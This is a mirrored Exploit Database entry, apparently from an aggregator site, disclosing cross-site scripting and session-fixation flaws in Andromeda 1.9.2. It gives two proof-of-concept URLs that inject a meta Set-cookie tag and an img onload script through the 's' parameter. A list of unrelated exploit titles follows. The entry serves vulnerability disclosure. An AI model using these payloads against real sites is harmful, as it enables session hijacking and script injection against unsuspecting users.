Andromeda 1.9.2 – ‘s’ Cross-Site Scripting / Session Fixation

Exploit Database
15 阅读

作者： indoushka

日期： 2010-03-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33762/

source: https://www.securityfocus.com/bid/38735/info

Andromeda is prone to a cross-site scripting vulnerability and a session-fixation vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and gain unauthorized access to the affected application.

Andromeda 1.9.2 is vulnerable; other versions may also be affected. 

http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://www.example.com/1.JPG+onload=alert(00213771818860)>

last Exploits
Andromeda 1.9.2 – ‘s’ Cross-Site Scripting / Session Fixation的更多信息

WordPress Plugin Brandfolder 3.0 – Local/Remote File Inclusion：
Vine VideoSite Creator Script – SQL Injection：
WSO2 Carbon 4.4.5 – Persistent Cross-Site Scripting：
Kimai 1.14 – CSV Injection：
Splunk Enterprise 7.2.3 – (Authenticated) Custom App Remote Code Execution：
Pre Classified Listing – SQL Injection：
BoutikOne – ‘rss_top10.php?lang’ SQL Injection：
WordPress Augmented-Reality – Remote Code Execution Unauthenticated：